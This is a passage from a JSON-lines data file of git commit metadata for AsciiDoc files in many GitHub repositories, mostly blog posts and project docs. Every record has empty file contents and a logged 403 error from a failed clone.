vidkarlsen\/camel,punkhorn\/camel-upstream,cunningt\/camel,kevinearls\/camel,davidkarlsen\/camel","old_file":"docs\/user-manual\/en\/backlog-tracer.adoc","new_file":"docs\/user-manual\/en\/backlog-tracer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ec37dc2f9bda2415e00f7f90d3fe81a2f780653","subject":"Update 2016-04-17-Android.adoc","message":"Update 2016-04-17-Android.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-04-17-Android.adoc","new_file":"_posts\/2016-04-17-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a5bb9b8d380ce08e47169f2829adecd00646939","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9ae05ce72da0cacf4c8135a0bb2f26061c7f7f0","subject":"Update 2018-04-30-v411.adoc","message":"Update 2018-04-30-v411.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-30-v411.adoc","new_file":"_posts\/2018-04-30-v411.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97c8102fbd4117b41348fd68ffd51c67934fcbf0","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-repository-redis","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-repository-redis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"627838cc44f0ca22f53d1dacd4a21bf17300781a","subject":"Add contributing page","message":"Add contributing 
page\n","repos":"dejon97\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,spring-io\/initializr,bclozel\/initializr,nevenc-pivotal\/initializr,mikegehard\/initializr,Dragon3392\/initializr,gwidgets\/gwt-project-generator,dejon97\/initializr,praseodym\/initializr,mikegehard\/initializr,trifonnt\/initializr,trifonnt\/initializr,dejon97\/initializr,snicoll\/initializr,spring-io\/initializr,gwidgets\/gwt-project-generator,Arsene07\/forge,jadekler\/initializr,trifonnt\/initializr,praseodym\/initializr,MarkyMarkMcDonald\/initializr,bclozel\/initializr,Dragon3392\/initializr,dsyer\/initializr,jadekler\/initializr,nevenc-pivotal\/initializr,trifonnt\/initializr,Arsene07\/forge,snicoll\/initializr,mikegehard\/initializr,bclozel\/initializr,nevenc-pivotal\/initializr,nevenc-pivotal\/initializr,Arsene07\/forge,mikegehard\/initializr,jadekler\/initializr,gwidgets\/gwt-project-generator,MarkyMarkMcDonald\/initializr,gwidgets\/gwt-project-generator,praseodym\/initializr,MarkyMarkMcDonald\/initializr,Arsene07\/forge,praseodym\/initializr,bclozel\/initializr,dsyer\/initializr,dsyer\/initializr,jadekler\/initializr,bclozel\/initializr,MarkyMarkMcDonald\/initializr,spring-io\/initializr,snicoll\/initializr,Dragon3392\/initializr,dejon97\/initializr,Dragon3392\/initializr,dsyer\/initializr","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MarkyMarkMcDonald\/initializr.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f19214e2c7ec862a14b9f96a71f6134e1249f37","subject":"Java 17","message":"Java 17\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09f1106ffb18cb246cae7df6c06931be90ee8c55","subject":"Update 2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","message":"Update 2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","repos":"cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io,cegohub\/cegohub.github.io","old_file":"_posts\/2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","new_file":"_posts\/2016-10-12-Como-pre-visualizar-UR-L-no-Safari.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cegohub\/cegohub.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffafa592f0d4cb9687bd2c56017d33693421c6d3","subject":"JPA start","message":"JPA start\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"JPA.adoc","new_file":"JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c293fa7a0b3b9dd1c9db4b9194ea5a0716e0280","subject":"Create migration-notes.adoc","message":"Create migration-notes.adoc","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"migration-notes.adoc","new_file":"migration-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ee354b9a1eadc03766047b77dccfcb2069f3847","subject":"Delete the file at '3-3-2017-Matt-Does-Info-Sec.adoc'","message":"Delete the file at '3-3-2017-Matt-Does-Info-Sec.adoc'","repos":"mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io,mattdoesinfosec\/mattdoesinfosec.github.io","old_file":"3-3-2017-Matt-Does-Info-Sec.adoc","new_file":"3-3-2017-Matt-Does-Info-Sec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattdoesinfosec\/mattdoesinfosec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef941bc9a58f3e26eb5ad6a4fde1ee2366efad5d","subject":"2016-07-10-Galactica.adoc","message":"2016-07-10-Galactica.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-10-Galactica.adoc","new_file":"_posts\/2016-07-10-Galactica.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c8f10902b677ade888e61d0eb82917a6825e64b","subject":"Update terminology from front page","message":"Update terminology from front page","repos":"pidydx\/artifacts,destijl\/artifacts,pidydx\/artifacts,destijl\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25e39d84bc0361ac105be696cdf15d652c8631a5","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ae8009f469565547d0a71d5cd8c0caf5cf5346b","subject":"Update 2015-12-14-Test-Post.adoc","message":"Update 2015-12-14-Test-Post.adoc","repos":"ReadyP1\/hubpress.io,ReadyP1\/hubpress.io,ReadyP1\/hubpress.io","old_file":"_posts\/2015-12-14-Test-Post.adoc","new_file":"_posts\/2015-12-14-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ReadyP1\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec0e038fc8110acf3540719258fe1ad247c24a3e","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 
2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d7088365e171012d85aabe5162bc1c35e5391b5","subject":"Update 2016-6-29-PHPER-RBAC.adoc","message":"Update 2016-6-29-PHPER-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHPER-RBAC.adoc","new_file":"_posts\/2016-6-29-PHPER-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09adf966de1822948e63a242d48b84afe6a16fc0","subject":"Update 2018-09-10-Firestore.adoc","message":"Update 2018-09-10-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-10-Firestore.adoc","new_file":"_posts\/2018-09-10-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"707a74175928464588728b5f0681e1853a8d7c6a","subject":"Rephr","message":"Rephr\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Maven central.adoc","new_file":"Maven central.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1753f85802d8c7840b6e630543412977177fe1d6","subject":"Update 2015-06-02-Citrus.adoc","message":"Update 2015-06-02-Citrus.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-02-Citrus.adoc","new_file":"_posts\/2015-06-02-Citrus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be002940ca7daf0609d32a3e55cfe71eda2b517d","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5c6a364f0d50359a21b162ab3b0f124c2c03c2a","subject":"Update 2016-03-09-Episode-49-Double-the-Bart.adoc","message":"Update 
2016-03-09-Episode-49-Double-the-Bart.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-03-09-Episode-49-Double-the-Bart.adoc","new_file":"_posts\/2016-03-09-Episode-49-Double-the-Bart.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62414000bd049969de9eab5ce245d3637bfdd894","subject":"recreated empty docs","message":"recreated empty docs\n","repos":"phatonin\/yadrol,phatonin\/yadrol,phatonin\/yadrol","old_file":"docs\/index.asciidoc","new_file":"docs\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phatonin\/yadrol.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"592300fe2d080516b9615d1a8edb2b44da8414a6","subject":"y2b create post Moto G Unboxing + Water Test (2015)","message":"y2b create post Moto G Unboxing + Water Test (2015)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-31-Moto-G-Unboxing--Water-Test-2015.adoc","new_file":"_posts\/2015-07-31-Moto-G-Unboxing--Water-Test-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f9437053bce96d8a42669b8b382e13b6db995e6","subject":"initial commit of user manual.","message":"initial commit of user manual.\n","repos":"Admios\/watson-alchemy-language-connector","old_file":"doc\/user-manual.adoc","new_file":"doc\/user-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Admios\/watson-alchemy-language-connector.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83de7ca94c760be89fbc79c713b358f0aefdd4ed","subject":"minor fixes after xored spec update","message":"minor fixes after xored spec update\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_scapy_rpc_server.asciidoc","new_file":"trex_scapy_rpc_server.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"17810c2bbb1fa7f36aab9936cce838ffac741bec","subject":"Update 2019-04-22-Cloud-Run.adoc","message":"Update 2019-04-22-Cloud-Run.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_file":"_posts\/2019-04-22-Cloud-Run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17bd61bdf78bc253c1ef63ba2a939352f615c18d","subject":"Update 2016-02-03-Hallo-Welt.adoc","message":"Update 2016-02-03-Hallo-Welt.adoc","repos":"Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io,Mentaxification\/Mentaxification.github.io","old_file":"_posts\/2016-02-03-Hallo-Welt.adoc","new_file":"_posts\/2016-02-03-Hallo-Welt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mentaxification\/Mentaxification.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d76ac78c54b3422b86bebf92362cc6c36bdf8f","subject":"APPNG-2004 add code of conduct","message":"APPNG-2004 add code of conduct\n","repos":"appNG\/appng,appNG\/appng,appNG\/appng","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/appNG\/appng.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8493fde642ba859d294e49daaad414fd0c76b3e7","subject":"Update 2017-08-23-githooks.adoc","message":"Update 2017-08-23-githooks.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-23-githooks.adoc","new_file":"_posts\/2017-08-23-githooks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64a26c9532c54418c8aaf5c437e7e1dc7828a400","subject":"Update 2017-10-02-Iterator.adoc","message":"Update 2017-10-02-Iterator.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-02-Iterator.adoc","new_file":"_posts\/2017-10-02-Iterator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14190da5cc1b5e50314cd9e49581274d8266ccbf","subject":"Update 2019-01-14-bash-D-B.adoc","message":"Update 2019-01-14-bash-D-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-14-bash-D-B.adoc","new_file":"_posts\/2019-01-14-bash-D-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"485a7ef789883e14a23d90c5319a7aaa7d9c1137","subject":"y2b create post UNBOXING HOT FIRE!","message":"y2b create post UNBOXING HOT 
FIRE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-06-UNBOXING-HOT-FIRE.adoc","new_file":"_posts\/2015-09-06-UNBOXING-HOT-FIRE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b144181add6d700f4851a2ded618c1d3c948819","subject":"Update 2015-11-13-a-light-simulator.adoc","message":"Update 2015-11-13-a-light-simulator.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2015-11-13-a-light-simulator.adoc","new_file":"_posts\/2015-11-13-a-light-simulator.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be77f59dbf740ad7cc5100b2601c45b959f7899f","subject":"Update 2015-11-14-O-que-e-ser-homem.adoc","message":"Update 2015-11-14-O-que-e-ser-homem.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-14-O-que-e-ser-homem.adoc","new_file":"_posts\/2015-11-14-O-que-e-ser-homem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b53e11f536c6491b7cc6479bc0bec18126481f4e","subject":"Update 2016-08-07-Test-Post.adoc","message":"Update 2016-08-07-Test-Post.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-08-07-Test-Post.adoc","new_file":"_posts\/2016-08-07-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccd16662acf2826858203bd6f26167f7881d2733","subject":"Create README.adoc","message":"Create README.adoc","repos":"alejandroSuch\/angular-cli","old_file":"1.0.0-beta.25.5\/ubuntu\/README.adoc","new_file":"1.0.0-beta.25.5\/ubuntu\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alejandroSuch\/angular-cli.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"395960feef68fa342c35057a22cc7817c64c6ef1","subject":"Docs: Updated standard token filter docs to indicate true behavior: doing nothing","message":"Docs: Updated standard token filter docs to indicate true behavior: doing nothing\n\nCloses 
#9300\n","repos":"rhoml\/elasticsearch,coding0011\/elasticsearch,likaiwalkman\/elasticsearch,bestwpw\/elasticsearch,ouyangkongtong\/elasticsearch,gmarz\/elasticsearch,masterweb121\/elasticsearch,jaynblue\/elasticsearch,palecur\/elasticsearch,Brijeshrpatel9\/elasticsearch,kalimatas\/elasticsearch,AndreKR\/elasticsearch,awislowski\/elasticsearch,myelin\/elasticsearch,vroyer\/elassandra,ckclark\/elasticsearch,Chhunlong\/elasticsearch,lightslife\/elasticsearch,davidvgalbraith\/elasticsearch,djschny\/elasticsearch,iamjakob\/elasticsearch,kubum\/elasticsearch,rhoml\/elasticsearch,javachengwc\/elasticsearch,rlugojr\/elasticsearch,dongjoon-hyun\/elasticsearch,camilojd\/elasticsearch,mrorii\/elasticsearch,nazarewk\/elasticsearch,MetSystem\/elasticsearch,nellicus\/elasticsearch,zkidkid\/elasticsearch,AshishThakur\/elasticsearch,andrejserafim\/elasticsearch,vroyer\/elasticassandra,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,jchampion\/elasticsearch,hanst\/elasticsearch,LeoYao\/elasticsearch,Charlesdong\/elasticsearch,lydonchandra\/elasticsearch,onegambler\/elasticsearch,jimhooker2002\/elasticsearch,phani546\/elasticsearch,mkis-\/elasticsearch,lzo\/elasticsearch-1,phani546\/elasticsearch,sjohnr\/elasticsearch,vietlq\/elasticsearch,amaliujia\/elasticsearch,pablocastro\/elasticsearch,hirdesh2008\/elasticsearch,martinstuga\/elasticsearch,socialrank\/elasticsearch,ouyangkongtong\/elasticsearch,obourgain\/elasticsearch,koxa29\/elasticsearch,mohit\/elasticsearch,mm0\/elasticsearch,heng4fun\/elasticsearch,mcku\/elasticsearch,mjhennig\/elasticsearch,beiske\/elasticsearch,achow\/elasticsearch,Ansh90\/elasticsearch,AndreKR\/elasticsearch,xingguang2013\/elasticsearch,nezirus\/elasticsearch,pranavraman\/elasticsearch,dataduke\/elasticsearch,amit-shar\/elasticsearch,mgalushka\/elasticsearch,vingupta3\/elasticsearch,fooljohnny\/elasticsearch,chirilo\/elasticsearch,dongjoon-hyun\/elasticsearch,kaneshin\/elasticsearch,wuranbo\/elasticsearch,Uiho\/elasticsearch,lchennup\/elasticsearch,kubum\/elasticsearch,elancom\/elasticsearch,bestwpw\/elasticsearch,EasonYi\/elasticsearch,strapdata\/elassandra-test,dataduke\/elasticsearch,mohit\/elasticsearch,knight1128\/elasticsearch,easonC\/elasticsearch,koxa29\/elasticsearch,EasonYi\/elasticsearch,xuzha\/elasticsearch,ThalaivaStars\/OrgRepo1,jw0201\/elastic,vietlq\/elasticsearch,AndreKR\/elasticsearch,dpursehouse\/elasticsearch,springning\/elasticsearch,acchen97\/elasticsearch,Siddartha07\/elasticsearch,acchen97\/elasticsearch,wangyuxue\/elasticsearch,robin13\/elasticsearch,jbertouch\/elasticsearch,F0lha\/elasticsearch,Asimov4\/elasticsearch,tsohil\/elasticsearch,hafkensite\/elasticsearch,kevinkluge\/elasticsearch,ImpressTV\/elasticsearch,Rygbee\/elasticsearch,kcompher\/elasticsearch,zeroctu\/elasticsearch,djschny\/elasticsearch,Microsoft\/elasticsearch,rhoml\/elasticsearch,aglne\/elasticsearch,luiseduardohdbackup\/elasticsearch,chrismwendt\/elasticsearch,tebriel\/elasticsearch,mnylen\/elasticsearch,MichaelLiZhou\/elasticsearch,andrestc\/elasticsearch,mute\/elasticsearch,djschny\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,beiske\/elasticsearch,mute\/elasticsearch,camilojd\/elasticsearch,yynil\/elasticsearch,awislowski\/elasticsearch,lks21c\/elasticsearch,zkidkid\/elasticsearch,alexkuk\/elasticsearch,jango2015\/elasticsearch,mmaracic\/elasticsearch,clintongormley\/elasticsearch,rmuir\/elasticsearch,ulkas\/elasticsearch,hydro2k\/elasticsearch,HarishAtGitHub\/elasticsearch,Widen\/elasticsearch,Rygbee\/elasticsearch,xuzha\/elasticsearch,spiegela\/elasticsearch,y
dsakyclguozi\/elasticsearch,ydsakyclguozi\/elasticsearch,queirozfcom\/elasticsearch,scorpionvicky\/elasticsearch,rmuir\/elasticsearch,kenshin233\/elasticsearch,lydonchandra\/elasticsearch,tahaemin\/elasticsearch,palecur\/elasticsearch,mortonsykes\/elasticsearch,jimhooker2002\/elasticsearch,yanjunh\/elasticsearch,vroyer\/elassandra,linglaiyao1314\/elasticsearch,elancom\/elasticsearch,mm0\/elasticsearch,jimczi\/elasticsearch,slavau\/elasticsearch,ckclark\/elasticsearch,chrismwendt\/elasticsearch,Kakakakakku\/elasticsearch,fred84\/elasticsearch,skearns64\/elasticsearch,ZTE-PaaS\/elasticsearch,knight1128\/elasticsearch,yuy168\/elasticsearch,snikch\/elasticsearch,hechunwen\/elasticsearch,truemped\/elasticsearch,hydro2k\/elasticsearch,iamjakob\/elasticsearch,jaynblue\/elasticsearch,fernandozhu\/elasticsearch,ulkas\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,lchennup\/elasticsearch,Clairebi\/ElasticsearchClone,brandonkearby\/elasticsearch,davidvgalbraith\/elasticsearch,kalimatas\/elasticsearch,xpandan\/elasticsearch,hanst\/elasticsearch,masterweb121\/elasticsearch,coding0011\/elasticsearch,mrorii\/elasticsearch,kevinkluge\/elasticsearch,chirilo\/elasticsearch,easonC\/elasticsearch,phani546\/elasticsearch,girirajsharma\/elasticsearch,koxa29\/elasticsearch,mapr\/elasticsearch,ckclark\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,fekaputra\/elasticsearch,StefanGor\/elasticsearch,nomoa\/elasticsearch,lightslife\/elasticsearch,artnowo\/elasticsearch,markharwood\/elasticsearch,coding0011\/elasticsearch,lmtwga\/elasticsearch,ydsakyclguozi\/elasticsearch,caengcjd\/elasticsearch,ThalaivaStars\/OrgRepo1,hechunwen\/elasticsearch,strapdata\/elassandra-test,Rygbee\/elasticsearch,wittyameta\/elasticsearch,kalburgimanjunath\/elasticsearch,mbrukman\/elasticsearch,episerver\/elasticsearch,kenshin233\/elasticsearch,yuy168\/elasticsearch,Liziyao\/elasticsearch,fekaputra\/elasticsearch,vingupta3\/elasticsearch,javachengwc\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,vrkansagara\/elasticsearch,sarwarbhuiyan\/elasticsearch,hirdesh2008\/elasticsearch,overcome\/elasticsearch,kimimj\/elasticsearch,queirozfcom\/elasticsearch,btiernay\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,khiraiwa\/elasticsearch,jango2015\/elasticsearch,pozhidaevak\/elasticsearch,fforbeck\/elasticsearc